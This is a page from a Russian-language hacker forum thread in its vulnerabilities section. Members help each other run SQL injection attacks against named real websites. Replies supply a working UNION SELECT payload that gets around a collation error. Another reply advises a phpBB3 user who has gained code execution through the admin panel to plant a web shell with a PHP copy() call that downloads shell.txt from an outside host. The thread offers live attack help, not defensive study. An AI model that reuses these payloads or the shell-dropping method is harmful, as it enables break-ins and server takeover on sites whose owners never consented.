ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3811  
Старый 23.11.2008, 04:58
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

PHP код:
<?
echo date("d.m.Y H:i"1227282680);
?>
21.11.2008 18:51
 
Ответить с цитированием

  #3812  
Старый 24.11.2008, 22:07
Аватар для d1aVOL
d1aVOL
Познающий
Регистрация: 29.07.2007
Сообщений: 49
Провел на форуме:
279583

Репутация: 7
По умолчанию

имеется sql inj
Цитата:
_http://www.heimlichinstitute.org/page.php?id=-1+union+select+1,2,3,4--
если делаю чтонибудь наподобие:
Цитата:
_http://www.heimlichinstitute.org/page.php?id=-1+union+select+1,VERSION(),3,4--
то выводится ошибка:
Цитата:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
что я не правильно делаю? как тут быть?
 
Ответить с цитированием

  #3813  
Старый 24.11.2008, 22:09
Аватар для [Raz0r]
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

http://www.heimlichinstitute.org/page.php?id=-1+union+select+1,unhex(hex(VERSION())),3,4--
я первый!
 
Ответить с цитированием

  #3814  
Старый 24.11.2008, 22:10
Аватар для .Slip
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

http://www.heimlichinstitute.org/page.php?id=-1+union+select+1,unhex(hex(VERSION())),3,4--

add:
Raz0r,
 
Ответить с цитированием

  #3815  
Старый 24.11.2008, 22:24
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Ребят, вот на первый взгляд SQL на сайте Онтона Усральского:
http://anton-uralskiy.ru/index.php?option=com_fireboard&Itemid=-1'+union+select+1/*

Пробовал по всякому, в начале подставлял и -1, и -1' и -1%27, -1%2527
В конце и /* потом # далее +-- и просто -- %23.

Но всё глухо, нигде нету "предложения" правильно указать колонки.
Я в этом не очень хорошо шарю, тут возможен вывод, или просто обычная ошибка?
 
Ответить с цитированием

  #3816  
Старый 24.11.2008, 22:28
Аватар для .Slip
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Главная You have an error in your SQL syntax near \'union+select+1/*\', \'90.150.48.**\', \'0\')\' at line 1 SQL=INSERT INTO jos_fb_whoisonline (`userid` , `time`, `what`, `task`, `do`, `func`,`link`, `userip`, `user`) VALUES (\'0\', \'1227551255\', \'Главная\',\'\',\'\',\'\',\'/index.php?option=com_fireboard&Itemid=-1\'+union+select+1/*\', \'90.150.**.**\', \'0\')

Скуль в инсерте. Толку нету. Таблица бестолковая, да и magic_quotes_gpc = on. Можешь забить на неё.
 
Ответить с цитированием

  #3817  
Старый 25.11.2008, 02:57
Аватар для o3,14um
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

Цитата:
Сообщение от Nightmarе  
Ребят, вот на первый взгляд SQL на сайте Онтона Усральского:
http://anton-uralskiy.ru/index.php?option=com_fireboard&Itemid=-1'+union+select+1/*

Пробовал по всякому, в начале подставлял и -1, и -1' и -1%27, -1%2527
В конце и /* потом # далее +-- и просто -- %23.

Но всё глухо, нигде нету "предложения" правильно указать колонки.
Я в этом не очень хорошо шарю, тут возможен вывод, или просто обычная ошибка?
нихрена там нет. Ищи на багтреках про жумлу
 
Ответить с цитированием

  #3818  
Старый 25.11.2008, 03:02
Аватар для Ghost0ff
Ghost0ff
Новичок
Регистрация: 18.11.2008
Сообщений: 28
Провел на форуме:
109973

Репутация: 15
Отправить сообщение для Ghost0ff с помощью ICQ
По умолчанию

Вопрос такой... phpbb3 форум.. я задал тут вопрос как мне через админку залить шелл? ответили что через восстановление базы и в коде :UPDATE forum_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig=phpinfo() WHERE user_id=2;
Сработало однако )) Но вот незадача... я хз че дальше то делать. Что можно выполнить используя данный код. что то прописать в нем вместо phpinfo()? подскажите...
 
Ответить с цитированием

  #3819  
Старый 25.11.2008, 03:28
Аватар для o3,14um
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

видимо, любую пхп комманду =)
 
Ответить с цитированием

  #3820  
Старый 25.11.2008, 03:52
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ghost0ff  
Вопрос такой... phpbb3 форум.. я задал тут вопрос как мне через админку залить шелл? ответили что через восстановление базы и в коде :UPDATE forum_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig=phpinfo() WHERE user_id=2;
Сработало однако )) Но вот незадача... я хз че дальше то делать. Что можно выполнить используя данный код. что то прописать в нем вместо phpinfo()? подскажите...
Пиши пиши....
copy('http://sute.ru/shell.txt','/home/site/phpbb3/avatars/shell.php');
Примерно так... в первом параметре ссылку на шелл во втором полный путь до файла который создать.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ